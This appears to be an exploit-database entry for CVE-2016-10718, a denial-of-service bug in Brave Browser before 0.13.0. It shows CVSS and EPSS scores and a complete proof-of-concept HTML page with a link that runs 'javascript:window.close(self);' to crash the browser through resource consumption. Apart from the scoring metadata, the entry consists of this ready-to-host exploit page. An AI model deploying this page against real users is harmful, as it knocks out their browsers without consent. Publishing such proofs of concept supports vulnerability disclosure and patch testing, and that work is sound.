Sahil TikooEDB-ID:44475Brave Browser < 0.13.0 - 'window.close(self)' Denial of Service
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
0.016 Low
EPSS
Percentile
87.3%
# Exploit Title:Brave Browser < 0.13.0 Denial of Service (resource consumption) via a window.close(self) js code.
# Date: 2017-10-16
# Exploit Author: Sahil Tikoo
# Vendor Homepage: https://brave.com
# Software Link: https://github.com/brave/browser-laptop
# Version: 0.12.5
# Tested on: Kali Linux,Ubuntu ,Windows OS
# CVE : CVE-2016-10718
<html>
<title>Brave Window Object Remote Denial of Service.</title>
<head></head>
<body><br><br>
<h1><center>Brave Window Object Remote Denial of Service</center></h1><br><br>
<h2><center>Proof of Concept</center></br></br> </h2>
<center>
<b>Click the below link to Trigger the Vulnerability..</b><br><br>
<hr></hr>
<hr></hr>
<b><center><a href="javascript:window.close(self);">Brave Window Object DoS Test POC</a></center>
</center>
</body>
</html>Related
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
0.016 Low
EPSS
Percentile
87.3%